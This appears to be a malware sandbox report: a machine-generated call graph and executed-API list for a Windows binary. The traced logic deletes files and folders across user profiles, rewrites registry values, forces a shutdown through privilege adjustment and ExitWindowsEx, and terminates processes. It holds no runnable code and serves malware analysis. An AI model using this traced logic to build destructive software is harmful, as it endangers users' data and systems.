StrCpyW GetProcessHeap HeapFree GetProcessHeap HeapFree 12921->12922 12922->12887 12924 40357d 12923->12924 12924->12924 12925 403588 WinHttpCrackUrl 12924->12925 12925->12893 12931 40c5be 12926->12931 12929 408761 17 API calls 12930 40d384 ExitProcess 12929->12930 12932 40c5c1 TerminateThread CloseHandle 12931->12932 12932->12932 12933 40c5e3 TerminateProcess CloseHandle 12932->12933 12933->12929 12935 4048c2 12934->12935 12936 404aab GetProcessHeap HeapAlloc GetCurrentProcessId CreateThread CloseHandle 12934->12936 12935->12936 12937 4048ca OpenProcess 12935->12937 12936->12745 12938 404a96 GetProcessHeap HeapFree GetProcessHeap HeapFree 12937->12938 12939 4048ea OpenProcessToken 12937->12939 12938->12936 12940 40491a ProcessIdToSessionId 12939->12940 12941 404911 12939->12941 12942 404a81 CloseHandle 12940->12942 12943 40492f GetTokenInformation GetLastError 12940->12943 12941->12940 12944 404a8a CloseHandle 12941->12944 12942->12944 12943->12942 12945 404953 GetProcessHeap HeapAlloc 12943->12945 12944->12938 12945->12942 12946 40496c GetTokenInformation 12945->12946 12947 404983 LookupAccountSidW 12946->12947 12948 404a77 GetProcessHeap HeapFree 12946->12948 12947->12948 12949 4049ab GetProcessHeap HeapAlloc 12947->12949 12948->12942 12950 404a20 GetCursor 12949->12950 12951 404a2d 12950->12951 12951->12950 12952 404a45 wsprintfW GetProcessHeap HeapFree 12951->12952 12952->12948 12954 403e58 12953->12954 12957 40345c 12953->12957 13039 403950 12954->13039 12957->12774 12980 403300 12957->12980 12958 4038f7 2 API calls 12959 403e6b 12958->12959 12960 403e76 GetProcessHeap HeapAlloc 12959->12960 12961 40410f GetProcessHeap HeapFree 12959->12961 12962 403eed GetTickCount 12960->12962 12961->12957 12963 403efa 12962->12963 12963->12962 12964 403f19 wsprintfW 12963->12964 12965 403f4f GetProcessHeap HeapAlloc 12964->12965 12966 403f86 GetCaretBlinkTime 12965->12966 12967 403f93 12966->12967 12967->12966 12968 403fb5 wsprintfW 12967->12968 12969 4038f7 2 API calls 12968->12969 12976 403fee 12969->12976 12970 403ffc RegQueryValueExW 12972 404074 RegCloseKey 12970->12972 12973 404027 GetProcessHeap HeapAlloc 12970->12973 12971 4040e1 GetProcessHeap HeapFree 12971->12965 12974 4040f9 RegCloseKey GetProcessHeap HeapFree 12971->12974 12972->12971 12972->12976 12975 40403c RegQueryValueExW 12973->12975 12973->12976 12974->12961 12975->12972 12975->12976 12976->12970 12976->12971 12976->12972 12977 404096 GetProcessHeap HeapAlloc 12976->12977 12978 4040a4 GetProcessHeap HeapReAlloc 12976->12978 12979 4040b7 GetProcessHeap HeapFree 12977->12979 12978->12979 12979->12971 12981 40331f 12980->12981 12982 4033c7 12980->12982 12981->12982 13050 40ea7f 12981->13050 12982->12768 12982->12774 12984 40336d lstrcpyA 12988 4033a6 12984->12988 12985 4033bd 12987 40482b 2 API calls 12985->12987 12987->12982 12988->12985 12989 4033ab lstrcpyA 12988->12989 12989->12988 12991 40321f GetCapture 12990->12991 12992 40322c 12991->12992 12992->12991 12993 40324b 12992->12993 12994 4032d8 GetProcessHeap HeapFree 12993->12994 12997 4032a3 Sleep 12993->12997 13064 40b964 12993->13064 12994->12774 12997->12993 12999 40ba40 GetShellWindow 12998->12999 13000 40ba4d 12999->13000 13000->12999 13001 40ba6c GetProcessHeap HeapAlloc 13000->13001 13002 40bab6 GetMessageTime 13001->13002 13003 40bac3 13002->13003 13003->13002 13004 40bae2 GetModuleHandleA GetProcAddress 13003->13004 13005 403e17 39 API calls 13004->13005 13006 40bb01 13005->13006 13007 40482b 2 API calls 13006->13007 13008 40bb1a GetProcessHeap HeapFree GetProcessHeap HeapFree 13007->13008 13008->12774 13011 402926 13009->13011 13010 40314d 91 API calls 13010->13011 13011->13010 13012 402977 13011->13012 13014 402933 Sleep 13011->13014 13015 40297e 13011->13015 13013 40482b 2 API calls 13012->13013 13013->13015 13016 40482b 2 API calls 13014->13016 13015->12774 13016->13011 13018 403e0d 13017->13018 13019 403b17 13017->13019 13018->12774 13019->13018 13020 403950 9 API calls 13019->13020 13021 403b39 13020->13021 13022 4038f7 2 API calls 13021->13022 13023 403b45 13022->13023 13024 403e01 GetProcessHeap HeapFree 13023->13024 13025 403b50 GetProcessHeap HeapAlloc 13023->13025 13024->13018 13026 403bdf GetTickCount 13025->13026 13027 403bec 13026->13027 13027->13026 13028 403c0b wsprintfW 13027->13028 13029 403c52 GetProcessHeap HeapAlloc 13028->13029 13030 403c6d GetCaretBlinkTime 13029->13030 13031 403c7a 13030->13031 13031->13030 13032 403c92 wsprintfW RegDeleteValueW GetProcessHeap HeapFree 13031->13032 13032->13029 13033 403cea 13032->13033 13034 403de7 RegCloseKey GetProcessHeap HeapFree 13033->13034 13035 403d1e GetProcessHeap HeapAlloc 13033->13035 13034->13024 13036 403d39 GetCaretBlinkTime 13035->13036 13037 403d46 13036->13037 13037->13036 13038 403d5e wsprintfW RegSetValueExW GetProcessHeap HeapFree 13037->13038 13038->13034 13038->13035 13040 403ad7 13039->13040 13041 403964 GetVersion 13039->13041 13040->12958 13042 403a0f GetProcessHeap HeapAlloc 13041->13042 13043 40397f GetProcessHeap HeapAlloc 13041->13043 13045 403a8a GetForegroundWindow 13042->13045 13044 4039c8 GetCurrentProcessId 13043->13044 13046 4039d5 13044->13046 13047 403a97 13045->13047 13046->13044 13048 4039f4 GetProcessHeap HeapFree 13046->13048 13047->13045 13047->13048 13048->13040 13051 40ea9f 13050->13051 13053 403332 13050->13053 13052 40eacb GetProcessHeap HeapAlloc 13051->13052 13051->13053 13054 40eb2b GetTickCount 13052->13054 13053->12982 13053->12984 13053->12985 13055 40eb38 13054->13055 13055->13054 13056 40eb53 GetProcessHeap HeapAlloc 13055->13056 13057 40eb8d GetShellWindow 13056->13057 13058 40eb9a 13057->13058 13058->13057 13059 40ebb9 LoadLibraryA GetProcAddress GetProcessHeap HeapAlloc 13058->13059 13060 40ec00 13059->13060 13061 40ec25 13060->13061 13062 40ec5a GetProcessHeap HeapFree 13060->13062 13063 40ec33 GetProcessHeap HeapFree GetProcessHeap HeapFree 13061->13063 13062->13063 13063->13053 13067 40b97b 13064->13067 13065 40314d 91 API calls 13065->13067 13066 40b9a7 Sleep 13066->13067 13067->13065 13067->13066 13068 40b9dd 13067->13068 13069 40482b 2 API calls 13067->13069 13068->12993 13069->13067 13071 402318 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13070->13071 13072 4028df 13070->13072 13073 4028a6 13071->13073 13074 402353 GetProcessHeap HeapAlloc GetProfilesDirectoryW 13071->13074 13072->12783 13075 4028ad GetProcessHeap HeapFree 13073->13075 13076 4028ba 13073->13076 13074->13073 13079 4023ac 13074->13079 13075->13076 13077 4028cb 13076->13077 13078 4028be GetProcessHeap HeapFree 13076->13078 13077->13072 13081 4028d2 GetProcessHeap HeapFree 13077->13081 13078->13077 13079->13079 13080 4023c2 GetProcessHeap HeapAlloc 13079->13080 13082 40240a GetOpenClipboardWindow 13080->13082 13081->13072 13083 402417 13082->13083 13083->13082 13084 40242f FindFirstFileW 13083->13084 13086 402482 13084->13086 13087 40288a FindClose GetProcessHeap HeapFree 13084->13087 13088 4024ba GetProcessHeap HeapAlloc 13086->13088 13087->13073 13089 4024dd GetCommandLineA 13088->13089 13090 4024ea 13089->13090 13090->13089 13091 402502 GetProcessHeap HeapAlloc 13090->13091 13092 40252b GetForegroundWindow 13091->13092 13093 402538 13092->13093 13093->13092 13094 402552 lstrcmpW 13093->13094 13095 402574 lstrcmpW 13094->13095 13096 402855 GetProcessHeap HeapFree GetProcessHeap HeapFree FindNextFileW 13094->13096 13095->13096 13097 40258a 13095->13097 13096->13088 13098 402887 13096->13098 13097->13096 13099 402597 GetProcessHeap HeapAlloc 13097->13099 13098->13087 13100 402610 GetCurrentProcessId 13099->13100 13101 40261d 13100->13101 13101->13100 13102 402638 GetProcessHeap HeapAlloc 13101->13102 13103 4026e9 GetCurrentProcessId 13102->13103 13104 4026f6 13103->13104 13104->13103 13105 402730 GetProcessHeap HeapAlloc 13104->13105 13106 4027a4 GetMenuCheckMarkDimensions 13105->13106 13107 4027b1 13106->13107 13107->13106 13108 4027cc wsprintfW GetFileAttributesW 13107->13108 13109 402810 GetProcessHeap HeapFree 13107->13109 13124 40e0ae 13107->13124 13108->13107 13108->13109 13109->13105 13111 40282f GetProcessHeap HeapFree GetProcessHeap HeapFree 13109->13111 13111->13096 13113 40c5be 2 API calls 13112->13113 13114 4022ae 13113->13114 13132 40d4ca GetProcessHeap HeapAlloc 13114->13132 13116 4022b3 GetFileAttributesW 13117 4022c4 13116->13117 13118 4022cf 13116->13118 13120 40e0ae 81 API calls 13117->13120 13148 401e16 8 API calls 13118->13148 13120->13118 13121 4022d4 Sleep 13177 401d22 GetProcessHeap HeapAlloc 13121->13177 13123 4022e4 13125 40d97f 6 API calls 13124->13125 13126 40e0ba DeleteFileW 13125->13126 13127 40e0cc 13126->13127 13128 40e0d3 13126->13128 13131 40890f 78 API calls 13127->13131 13129 40e0e9 13128->13129 13130 40e0d9 GetProcessHeap HeapFree 13128->13130 13129->13107 13130->13129 13131->13128 13133 40d524 GetDesktopWindow 13132->13133 13134 40d531 13133->13134 13134->13133 13135 40d550 CoInitialize 13134->13135 13136 40d752 GetProcessHeap HeapFree 13135->13136 13137 40d561 CoCreateInstance 13135->13137 13136->13116 13138 40d74c CoUninitialize 13137->13138 13146 40d580 13137->13146 13138->13136 13139 40d738 13139->13138 13140 40d70a CoTaskMemFree 13141 40d718 CoTaskMemFree 13140->13141 13140->13146 13141->13146 13142 40d62b StrStrIW 13143 40d6fc CoTaskMemFree 13142->13143 13142->13146 13143->13146 13144 40d664 StrStrIW 13144->13146 13145 40d6f9 CoTaskMemFree 13145->13143 13146->13138 13146->13139 13146->13140 13146->13142 13146->13143 13146->13144 13146->13145 13147 40d6ad StrStrIW StrCpyNW GetFileAttributesW 13146->13147 13147->13146 13149 401ecc GetCurrentProcessId 13148->13149 13150 401ed9 13149->13150 13150->13149 13151 401ef1 GetProcessHeap HeapAlloc 13150->13151 13152 401f73 GetCurrentProcessId 13151->13152 13153 401f80 13152->13153 13153->13152 13154 401f98 GetProfilesDirectoryW 13153->13154 13155 401fbd wsprintfW FindFirstFileW 13154->13155 13156 402199 GetProcessHeap HeapAlloc 13154->13156 13155->13156 13176 401feb 13155->13176 13157 402209 GetDialogBaseUnits 13156->13157 13159 402216 13157->13159 13158 401fed StrCmpW 13160 402007 StrCmpW 13158->13160 13161 402171 FindNextFileW 13158->13161 13159->13157 13162 40222e ExpandEnvironmentStringsW 13159->13162 13160->13161 13163 402021 13160->13163 13164 402183 FindClose 13161->13164 13161->13176 13165 40ddbf 48 API calls 13162->13165 13166 40204a StrCpyW GetProcessHeap HeapAlloc 13163->13166 13164->13176 13167 402247 12 API calls 13165->13167 13168 402072 GetProcessWindowStation 13166->13168 13167->13121 13169 40207f 13168->13169 13169->13168 13170 402099 StrCatW GetProcessHeap HeapAlloc 13169->13170 13171 4020ef GetDoubleClickTime 13170->13171 13172 4020fc 13171->13172 13172->13171 13173 402114 wsprintfW 13172->13173 13183 40ddbf 13173->13183 13176->13156 13176->13158 13176->13161 13178 401d83 GetMenuCheckMarkDimensions 13177->13178 13179 401d90 13178->13179 13179->13178 13180 401da8 GetCurrentProcess OpenProcessToken LookupPrivilegeValueA AdjustTokenPrivileges ExitWindowsEx 13179->13180 13181 401e03 GetProcessHeap HeapFree 13180->13181 13182 401dfd ExitWindowsEx 13180->13182 13181->13123 13182->13181 13184 40d97f 6 API calls 13183->13184 13185 40ddd9 lstrlenW GetProcessHeap HeapAlloc 13184->13185 13186 40de14 GetProcessHeap HeapAlloc 13185->13186 13187 40e096 13185->13187 13188 40de34 GetProcessHeap HeapAlloc 13186->13188 13189 40e087 13186->13189 13190 40e09d GetProcessHeap HeapFree 13187->13190 13191 402139 GetProcessHeap HeapFree GetProcessHeap HeapFree 13187->13191 13192 40de4e lstrcpyW GetProcessHeap HeapAlloc 13188->13192 13193 40e07d GetProcessHeap HeapFree 13188->13193 13189->13187 13194 40e08e GetProcessHeap HeapFree 13189->13194 13190->13191 13191->13166 13191->13176 13195 40de87 GetProcessWindowStation 13192->13195 13193->13189 13194->13187 13196 40de94 13195->13196 13196->13195 13197 40deb3 lstrcatW lstrcpyW GetProcessHeap HeapAlloc 13196->13197 13198 40df0c GetOpenClipboardWindow 13197->13198 13199 40df19 13198->13199 13199->13198 13200 40df38 lstrcatW FindFirstFileW 13199->13200 13201 40df5e 13200->13201 13202 40df66 13200->13202 13206 40e05a 6 API calls 13201->13206 13203 40e031 FindNextFileW 13202->13203 13204 40df7e lstrlenW 13202->13204 13202->13206 13208 40dfe9 lstrcatW 13202->13208 13210 40ddbf 6 API calls 13202->13210 13211 40e011 RemoveDirectoryW 13202->13211 13212 40e051 GetLastError 13202->13212 13203->13202 13203->13206 13204->13202 13205 40df95 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 13204->13205 13205->13201 13207 40dfc0 lstrcpyW lstrcatW 13205->13207 13206->13193 13207->13208 13208->13202 13209 40e01c DeleteFileW 13208->13209 13209->13202 13210->13202 13211->13202 13212->13201 11380 41f241 11416 421770 11380->11416 11382 41f24d GetStartupInfoW 11383 41f261 HeapSetInformation 11382->11383 11384 41f26c 11382->11384 11383->11384 11417 421738 HeapCreate 11384->11417 11386 41f2ba 11387 41f2c5 11386->11387 11483 41f1d1 11386->11483 11418 4215bd GetModuleHandleW 11387->11418 11390 41f2cb 11391 41f2d6 __RTC_Initialize 11390->11391 11392 41f1d1 38 API calls 11390->11392 11437 420f29 GetStartupInfoW 11391->11437 11392->11391 11395 41f2f0 GetCommandLineW 11450 420ed1 GetEnvironmentStringsW 11395->11450 11398 41f300 11457 420e23 GetModuleFileNameW 11398->11457 11401 41f315 11463 420be2 11401->11463 11403 4207e0 __amsg_exit 38 API calls 11403->11401 11405 41f31b 11406 4207e0 __amsg_exit 38 API calls 11405->11406 11408 41f326 11405->11408 11406->11408 11477 4205bf 11408->11477 11409 41f32e 11410 4207e0 __amsg_exit 38 API calls 11409->11410 11411 41f339 11409->11411 11410->11411 11412 41f369 11411->11412 11498 420796 11411->11498 11501 4207c2 11412->11501 11415 41f36e __CxxUnhandledExceptionFilter 11416->11382 11417->11386 11419 4215d1 11418->11419 11422 4215da TlsAlloc 11418->11422 11513 421290 11419->11513 11424 421733 11422->11424 11425 421672 11422->11425 11424->11390 11425->11424 11504 4204eb 11425->11504 11429 42172e 11430 421290 40 API calls 11429->11430 11430->11424 11434 421713 11526 4212cd 11434->11526 11436 42171b GetCurrentThreadId 11436->11424 11438 424c85 __XcptFilter 38 API calls 11437->11438 11447 420f47 11438->11447 11439 41f2e4 11439->11395 11491 4207e0 11439->11491 11440 4210f2 GetStdHandle 11449 4210bc 11440->11449 11441 424c85 __XcptFilter 38 API calls 11441->11447 11442 421156 SetHandleCount 11442->11439 11443 421104 GetFileType 11443->11449 11444 42103c 11445 421068 GetFileType 11444->11445 11446 421073 InitializeCriticalSectionAndSpinCount 11444->11446 11444->11449 11445->11444 11445->11446 11446->11439 11446->11444 11447->11439 11447->11441 11447->11444 11447->11449 11448 42112a InitializeCriticalSectionAndSpinCount 11448->11439 11448->11449 11449->11440 11449->11442 11449->11443 11449->11448 11451 420ee2 11450->11451 11453 420ee6 11450->11453 11451->11398 11454 424c40 ____mb_cur_max_l_func 38 API calls 11453->11454 11456 420f08 __expandlocale 11454->11456 11455 420f0f FreeEnvironmentStringsW 11455->11398 11456->11455 11458 420e58 _wparse_cmdline 11457->11458 11459 41f30a 11458->11459 11460 420e95 11458->11460 11459->11401 11459->11403 11461 424c40 ____mb_cur_max_l_func 38 API calls 11460->11461 11462 420e9b _wparse_cmdline 11461->11462 11462->11459 11465 420bfa _wcslen 11463->11465 11466 420bf2 11463->11466 11464 424c85 __XcptFilter 38 API calls 11470 420c1e _wcslen 11464->11470 11465->11464 11466->11405 11467 420c74 11468 424bcb __freea 38 API calls 11467->11468 11468->11466 11469 424c85 __XcptFilter 38 API calls 11469->11470 11470->11466 11470->11467 11470->11469 11471 420c9a 11470->11471 11472 424b1a __amsg_exit 38 API calls 11470->11472 11474 420cb1 11470->11474 11473 424bcb __freea 38 API calls 11471->11473 11472->11470 11473->11466 11475 422624 __set_controlfp 10 API calls 11474->11475 11476 420cbd 11475->11476 11476->11405 11480 4205cd __except_handler3 11477->11480 11479 4205eb __initterm_e 11481 42060c __except_handler3 11479->11481 11744 42483a 11479->11744 11741 41ffa6 11480->11741 11481->11409 11484 41f1df 11483->11484 11485 41f1e4 11483->11485 11486 4209d3 __amsg_exit 38 API calls 11484->11486 11487 420824 __amsg_exit 38 API calls 11485->11487 11486->11485 11488 41f1ec 11487->11488 11489 4204c1 __amsg_exit 3 API calls 11488->11489 11490 41f1f6 11489->11490 11490->11387 11492 4209d3 __amsg_exit 38 API calls 11491->11492 11493 4207ea 11492->11493 11494 420824 __amsg_exit 38 API calls 11493->11494 11495 4207f2 11494->11495 11808 4207ac 11495->11808 11499 420656 __amsg_exit 38 API calls 11498->11499 11500 4207a7 11499->11500 11500->11412 11502 420656 __amsg_exit 38 API calls 11501->11502 11503 4207cd 11502->11503 11503->11415 11537 42120d RtlEncodePointer 11504->11537 11506 4204f3 11538 423d10 RtlEncodePointer 11506->11538 11508 420519 11509 423d21 11508->11509 11510 423d2c 11509->11510 11511 423d36 InitializeCriticalSectionAndSpinCount 11510->11511 11512 4216c7 11510->11512 11511->11510 11511->11512 11512->11429 11520 424c85 11512->11520 11514 4212a9 11513->11514 11515 42129a RtlDecodePointer 11513->11515 11516 4212ba TlsFree 11514->11516 11517 4212c8 11514->11517 11515->11514 11516->11517 11519 4215d6 11517->11519 11539 424bcb 11517->11539 11519->11390 11523 424c8e 11520->11523 11522 4216f6 11522->11429 11522->11434 11523->11522 11524 424cac Sleep 11523->11524 11565 42bbe2 11523->11565 11525 424cc1 11524->11525 11525->11522 11525->11523 11576 421770 11526->11576 11528 4212d9 GetModuleHandleW 11577 423eb3 11528->11577 11530 421317 InterlockedIncrement 11584 42136f 11530->11584 11533 423eb3 ____mb_cur_max_l_func 36 API calls 11534 421338 __copytlocinfo_nolock 11533->11534 11587 421378 11534->11587 11536 421363 __CxxUnhandledExceptionFilter 11536->11436 11537->11506 11538->11508 11540 424bd6 HeapFree 11539->11540 11544 424bff __freea 11539->11544 11541 424beb 11540->11541 11540->11544 11545 423584 11541->11545 11544->11517 11548 421381 GetLastError 11545->11548 11547 423589 GetLastError 11547->11544 11562 42123f TlsGetValue 11548->11562 11551 4213ee SetLastError 11551->11547 11552 424c85 __XcptFilter 34 API calls 11553 4213ac 11552->11553 11553->11551 11554 4213b4 RtlDecodePointer 11553->11554 11555 4213c9 11554->11555 11556 4213e5 11555->11556 11557 4213cd 11555->11557 11558 424bcb __freea 34 API calls 11556->11558 11559 4212cd __XcptFilter 34 API calls 11557->11559 11560 4213eb 11558->11560 11561 4213d5 GetCurrentThreadId 11559->11561 11560->11551 11561->11551 11563 42126f 11562->11563 11564 421254 RtlDecodePointer TlsSetValue 11562->11564 11563->11551 11563->11552 11564->11563 11566 42bbee 11565->11566 11573 42bc09 11565->11573 11567 42bbfa 11566->11567 11566->11573 11569 423584 __get_errno 37 API calls 11567->11569 11568 42bc1c RtlAllocateHeap 11571 42bc43 11568->11571 11568->11573 11570 42bbff 11569->11570 11570->11523 11571->11523 11573->11568 11573->11571 11574 4246ef RtlDecodePointer 11573->11574 11575 424704 11574->11575 11575->11573 11576->11528 11578 423ec8 11577->11578 11579 423edb RtlEnterCriticalSection 11577->11579 11590 423df1 11578->11590 11579->11530 11581 423ece 11581->11579 11582 4207e0 __amsg_exit 37 API calls 11581->11582 11583 423eda 11582->11583 11583->11579 11739 423dc2 RtlLeaveCriticalSection 11584->11739 11586 421331 11586->11533 11740 423dc2 RtlLeaveCriticalSection 11587->11740 11589 42137f 11589->11536 11592 423dfd __CxxUnhandledExceptionFilter 11590->11592 11591 423e23 11601 423e33 __CxxUnhandledExceptionFilter 11591->11601 11651 424c40 11591->11651 11592->11591 11615 4209d3 11592->11615 11599 423e45 11603 423584 __get_errno 37 API calls 11599->11603 11600 423e54 11604 423eb3 ____mb_cur_max_l_func 37 API calls 11600->11604 11601->11581 11603->11601 11605 423e5b 11604->11605 11606 423e63 InitializeCriticalSectionAndSpinCount 11605->11606 11607 423e8e 11605->11607 11609 423e73 11606->11609 11614 423e7f 11606->11614 11608 424bcb __freea 37 API calls 11607->11608 11608->11614 11610 424bcb __freea 37 API calls 11609->11610 11611 423e79 11610->11611 11613 423584 __get_errno 37 API calls 11611->11613 11613->11614 11656 423eaa 11614->11656 11659 424b7d 11615->11659 11617 4209da 11619 424b7d __amsg_exit 38 API calls 11617->11619 11620 4209e7 11617->11620 11618 420824 __amsg_exit 38 API calls 11621 4209ff 11618->11621 11619->11620 11620->11618 11623 420a09 11620->11623 11622 420824 __amsg_exit 38 API calls 11621->11622 11622->11623 11624 420824 11623->11624 11625 420845 __amsg_exit 11624->11625 11627 424b7d __amsg_exit 35 API calls 11625->11627 11647 420961 11625->11647 11629 42085f 11627->11629 11628 4209d1 11648 4204c1 11628->11648 11630 420970 GetStdHandle 11629->11630 11631 424b7d __amsg_exit 35 API calls 11629->11631 11632 42097e _strlen 11630->11632 11630->11647 11633 420870 11631->11633 11636 4209b4 WriteFile 11632->11636 11632->11647 11633->11630 11634 420882 11633->11634 11634->11647 11684 424b1a 11634->11684 11636->11647 11638 4208ae GetModuleFileNameW 11639 4208cf 11638->11639 11643 4208db _wcslen 11638->11643 11640 424b1a __amsg_exit 35 API calls 11639->11640 11640->11643 11641 422624 __set_controlfp 10 API calls 11641->11643 11643->11641 11644 4249bd 35 API calls __amsg_exit 11643->11644 11645 420951 11643->11645 11693 424a32 11643->11693 11644->11643 11702 424851 11645->11702 11709 41fff1 11647->11709 11719 420496 GetModuleHandleW 11648->11719 11653 424c49 11651->11653 11654 423e3e 11653->11654 11655 424c60 Sleep 11653->11655 11722 42bb4e 11653->11722 11654->11599 11654->11600 11655->11653 11738 423dc2 RtlLeaveCriticalSection 11656->11738 11658 423eb1 11658->11601 11660 424b89 11659->11660 11661 423584 __get_errno 38 API calls 11660->11661 11662 424b93 11660->11662 11663 424bac 11661->11663 11662->11617 11666 422690 11663->11666 11669 422663 RtlDecodePointer 11666->11669 11670 422678 11669->11670 11675 422624 11670->11675 11672 42268f 11673 422663 __get_errno 10 API calls 11672->11673 11674 42269c 11673->11674 11674->11617 11678 4224c7 11675->11678 11679 4224e6 setSBUpLow 11678->11679 11680 422504 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11679->11680 11681 4225d2 setSBUpLow 11680->11681 11682 41fff1 setSBUpLow 5 API calls 11681->11682 11683 4225ee GetCurrentProcess TerminateProcess 11682->11683 11683->11672 11685 424b2f 11684->11685 11686 424b28 11684->11686 11687 423584 __get_errno 38 API calls 11685->11687 11686->11685 11689 424b50 11686->11689 11692 424b34 11687->11692 11688 422690 __get_errno 11 API calls 11690 4208a3 11688->11690 11689->11690 11691 423584 __get_errno 38 API calls 11689->11691 11690->11638 11690->11643 11691->11692 11692->11688 11695 424a44 11693->11695 11694 423584 __get_errno 38 API calls 11701 424a64 11694->11701 11696 424a4d 11695->11696 11697 424a48 11695->11697 11699 424a8b 11695->11699 11696->11643 11697->11694 11697->11696 11698 422690 __get_errno 11 API calls 11698->11696 11699->11696 11700 423584 __get_errno 38 API calls 11699->11700 11700->11701 11701->11698 11717 42120d RtlEncodePointer 11702->11717 11704 424877 11705 424887 LoadLibraryW 11704->11705 11706 42489c 11704->11706 11705->11706 11707 41fff1 setSBUpLow 5 API calls 11706->11707 11708 4249bb 11707->11708 11708->11647 11710 41fffb IsDebuggerPresent 11709->11710 11711 41fff9 11709->11711 11718 426949 11710->11718 11711->11628 11714 423b04 SetUnhandledExceptionFilter UnhandledExceptionFilter 11715 423b29 GetCurrentProcess TerminateProcess 11714->11715 11716 423b21 setSBUpLow 11714->11716 11715->11628 11716->11715 11717->11704 11718->11714 11720 4204ba ExitProcess 11719->11720 11721 4204aa GetProcAddress 11719->11721 11721->11720 11723 42bbcb 11722->11723 11731 42bb5c 11722->11731 11724 4246ef ___crtLCMapStringA RtlDecodePointer 11723->11724 11725 42bbd1 11724->11725 11726 423584 __get_errno 37 API calls 11725->11726 11729 42bbc3 11726->11729 11727 4209d3 __amsg_exit 37 API calls 11727->11731 11728 42bb8a RtlAllocateHeap 11728->11729 11728->11731 11729->11653 11730 420824 __amsg_exit 37 API calls 11730->11731 11731->11727 11731->11728 11731->11730 11732 42bbb7 11731->11732 11733 4204c1 __amsg_exit 3 API calls 11731->11733 11734 4246ef ___crtLCMapStringA RtlDecodePointer 11731->11734 11736 42bbb5 11731->11736 11735 423584 __get_errno 37 API calls 11732->11735 11733->11731 11734->11731 11735->11736 11737 423584 __get_errno 37 API calls 11736->11737 11737->11729 11738->11658 11739->11586 11740->11589 11742 41ffac RtlEncodePointer 11741->11742 11742->11742 11743 41ffc6 11742->11743 11743->11479 11747 4247fe 11744->11747 11746 424847 11746->11481 11748 42480a __CxxUnhandledExceptionFilter 11747->11748 11755 4204d9 11748->11755 11754 42482b __CxxUnhandledExceptionFilter 11754->11746 11756 423eb3 ____mb_cur_max_l_func 38 API calls 11755->11756 11757 4204e0 11756->11757 11758 424717 11757->11758 11759 42472e 11758->11759 11763 4247a9 11759->11763 11771 42badc 11759->11771 11761 424757 11761->11763 11765 42477b 11761->11765 11778 424cd1 11761->11778 11768 424834 11763->11768 11764 424cd1 42 API calls 11766 424791 11764->11766 11765->11763 11765->11764 11767 424797 RtlEncodePointer 11765->11767 11766->11763 11766->11767 11767->11763 11804 4204e2 11768->11804 11772 42bafc RtlSizeHeap 11771->11772 11773 42bae7 11771->11773 11772->11761 11774 423584 __get_errno 38 API calls 11773->11774 11775 42baec 11774->11775 11776 422690 __get_errno 11 API calls 11775->11776 11777 42baf7 11776->11777 11777->11761 11782 424cda 11778->11782 11780 424d19 11780->11765 11781 424cfa Sleep 11781->11782 11782->11780 11782->11781 11783 42bc64 11782->11783 11784 42bc7a 11783->11784 11785 42bc6f 11783->11785 11787 42bc82 11784->11787 11794 42bc8f 11784->11794 11786 42bb4e ___crtLCMapStringA 38 API calls 11785->11786 11788 42bc77 11786->11788 11789 424bcb __freea 38 API calls 11787->11789 11788->11782 11790 42bc8a __freea 11789->11790 11790->11782 11791 42bcc7 11792 4246ef ___crtLCMapStringA RtlDecodePointer 11791->11792 11795 42bccd 11792->11795 11793 42bc97 RtlReAllocateHeap 11793->11790 11793->11794 11794->11791 11794->11793 11797 42bcf7 11794->11797 11799 4246ef ___crtLCMapStringA RtlDecodePointer 11794->11799 11801 42bcdf 11794->11801 11796 423584 __get_errno 38 API calls 11795->11796 11796->11790 11798 423584 __get_errno 38 API calls 11797->11798 11800 42bcfc GetLastError 11798->11800 11799->11794 11800->11790 11802 423584 __get_errno 38 API calls 11801->11802 11803 42bce4 GetLastError 11802->11803 11803->11790 11807 423dc2 RtlLeaveCriticalSection 11804->11807 11806 4204e9 11806->11754 11807->11806 11811 420656 11808->11811 11810 4207bd 11812 420662 __CxxUnhandledExceptionFilter 11811->11812 11813 423eb3 ____mb_cur_max_l_func 38 API calls 11812->11813 11825 420669 11813->11825 11816 420790 __CxxUnhandledExceptionFilter 11816->11810 11818 420778 11819 4204c1 __amsg_exit 3 API calls 11818->11819 11821 420781 11819->11821 11820 420713 11826 420781 11820->11826 11823 42078e 11821->11823 11831 423dc2 RtlLeaveCriticalSection 11821->11831 11823->11810 11824 42120d RtlEncodePointer __amsg_exit 11824->11825 11825->11820 11825->11824 11827 420787 11826->11827 11829 420761 11826->11829 11832 423dc2 RtlLeaveCriticalSection 11827->11832 11829->11816 11830 423dc2 RtlLeaveCriticalSection 11829->11830 11830->11818 11831->11823 11832->11829 13213 170294 13215 17029c TerminateProcess 13213->13215

    Executed Functions

    APIs
    • SetErrorMode.KERNELBASE(00000000), ref: 0040EFD4
    • SetErrorMode.KERNELBASE(00000000), ref: 0040EFDA
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040F006
    • HeapAlloc.KERNEL32(00000000), ref: 0040F009
    • GetCapture.USER32 ref: 0040F024
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 0040F088
    • HeapAlloc.KERNEL32(00000000), ref: 0040F08B
    • GetFocus.USER32 ref: 0040F09F
    • LoadLibraryA.KERNEL32(?), ref: 0040F0C9
    • GetProcAddress.KERNEL32(00000000), ref: 0040F0D0
    • GetCommandLineW.KERNEL32 ref: 0040F0D8
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040F0F8
    • HeapAlloc.KERNEL32(00000000), ref: 0040F101
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F11C
    • GetProcessHeap.KERNEL32(00000008,00000029), ref: 0040F168
    • RtlAllocateHeap.NTDLL(00000000), ref: 0040F16B
    • IsSystemResumeAutomatic.KERNEL32 ref: 0040F17B
    • GetProcessHeap.KERNEL32(?,00000000), ref: 0040F1A5
    • GetModuleHandleW.KERNEL32(00000000,?), ref: 0040F1B8
      • Part of subcall function 00409C2E: GetProcessHeap.KERNEL32(00000008,00000208,?,00000000,76E6FE8D), ref: 00409C4C
      • Part of subcall function 00409C2E: HeapAlloc.KERNEL32(00000000), ref: 00409C59
      • Part of subcall function 00409C2E: GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D22
      • Part of subcall function 00409C2E: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D29
